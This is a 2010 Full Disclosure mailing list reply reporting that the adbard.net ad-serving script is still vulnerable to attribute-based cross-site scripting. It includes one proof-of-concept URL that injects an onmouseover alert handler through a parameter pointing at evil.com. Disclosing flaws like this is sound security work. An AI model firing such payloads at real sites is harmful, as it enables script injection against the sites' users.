Full Disclosure mailing list archives
Re: Ad Bard Network(adbard.net) - network-wide Cross Site Scripting Vulnerability
From: YGN Ethical Hacker Group <lists () yehg net>
Date: Thu, 19 Aug 2010 23:19:29 +0800
Although it seems to have been fixed, it's still vulnerable to Attribute-Based XSS. http://adbard.net/sites/default/modules/ad/serve.php?k=22e342dc6a6a99267a46f18fc5dcecf1&ab_s=18f5d31e3e39e9d3c8d5b850e79d4848&u=http://evil.com?x=%22%20onmouseover=%22alert%28/XSS/%29%22%20%3E --------------------------------- Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Ad Bard Network(adbard.net) - network-wide Cross Site Scripting Vulnerability YGN Ethical Hacker Group (Aug 17)
- Re: Ad Bard Network(adbard.net) - network-wide Cross Site Scripting Vulnerability YGN Ethical Hacker Group (Aug 19)